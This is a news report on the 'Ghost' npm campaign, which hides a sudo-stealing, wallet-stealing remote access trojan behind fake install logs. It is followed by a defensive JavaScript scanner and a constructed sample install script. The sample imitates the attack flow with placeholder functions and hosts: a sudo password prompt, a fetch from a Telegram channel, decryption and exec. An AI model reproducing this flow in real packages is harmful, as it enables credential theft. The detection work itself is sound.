A new malicious npm campaign, dubbed the “Ghost campaign,” has been identified by security researchers as using fake installation logs to hide malware activity. The attacks, discovered by ReversingLabs, involve malicious packages that mimic legitimate software installation processes while secretly downloading and executing malware designed to steal sensitive data and crypto wallets.
The campaign began in early February and includes several downloader-type packages that prompt users for their sudo password during installation, which is then used to run a remote access trojan on the victim’s system. Fake installation logs show messages about downloading dependencies, installation progress bars and delays to simulate real activity, but none of these actions take place.
The final payload is downloaded from external sources, including a Telegram channel and hidden web3 content, decrypted with a key retrieved online, and executed locally using the stolen sudo password. The final-stage malware is a remote access trojan capable of stealing crypto wallets and other sensitive data, with some versions including additional files to enhance data theft, according to ReversingLabs.
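The install-time behaviour described above can be triaged statically before a package is allowed to run its lifecycle hooks. The following is an added example written for this page, not code from ReversingLabs or from the campaign; the indicator patterns are assumed heuristics a reviewer would tune, and `promptUser`, `fetchText` and `decryptPayload` are placeholder names inside a constructed fixture, not real functions.

```javascript
// Static triage of an npm package's install-time scripts for the behaviour the
// article describes: a lifecycle hook that asks for a sudo password, fetches a
// remote payload, decrypts it and runs it behind fake "installing" output.
// Pure regex analysis; nothing from the package is executed. Samples are constructed.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
// Label -> pattern over the install script source (assumed heuristics, not proof).
const INDICATORS = [
  { label: "sudo-prompt",        re: /\bsudo\b/i },
  { label: "remote-download",    re: /https?:\/\/[^\s'"`]+/i },
  { label: "telegram-source",    re: /\bt\.me\/|api\.telegram\.org/i },
  { label: "shell-exec",         re: /child_process|\bexec(Sync)?\(|\bspawn(Sync)?\(/ },
  { label: "fake-progress",      re: /console\.log\([^)]*(Downloading|Installing|\d+%)/i },
  { label: "decrypt-at-runtime", re: /createDecipheriv|\bdecrypt\w*\(/i },
];
// pkg: parsed package.json; scriptSources: { "<path>": "<contents>" } for files
// the hooks invoke. Returns one finding per hook plus one per indicator hit.
function triageInstallScripts(pkg, scriptSources) {
  const findings = [];
  const scripts = (pkg && pkg.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (!(hook in scripts)) continue;
    const cmd = scripts[hook];
    findings.push({ hook, label: "lifecycle-hook", detail: cmd });
    for (const [file, src] of Object.entries(scriptSources)) {
      if (!cmd.includes(file)) continue; // only scan files this hook runs
      for (const { label, re } of INDICATORS) {
        const m = src.match(re);
        if (m) findings.push({ hook, label, detail: m[0].slice(0, 60) });
      }
    }
  }
  return findings;
}
// Constructed sample mirroring the article's description; not a real package.
const SAMPLE_PKG = { name: "example-downloader", version: "1.0.0",
                     scripts: { postinstall: "node ./install.js" } };
const SAMPLE_SCRIPT = `const { execSync } = require("child_process");
console.log("Downloading dependencies...");      // fake log, nothing is fetched
const pw = promptUser("Enter sudo password: ");  // npm never needs this
const blob = fetchText("https://t.me/s/EXAMPLE_CHANNEL");      // placeholder
const payload = decryptPayload(blob, fetchText("https://KEY_HOST_PLACEHOLDER/k"));
execSync("<runs payload with the captured password>");`;
console.log(triageInstallScripts(SAMPLE_PKG, { "./install.js": SAMPLE_SCRIPT }));
```

A single hit is only a flag for review; the combination of a lifecycle hook, a sudo prompt and a remote fetch is what makes a package worth blocking before install.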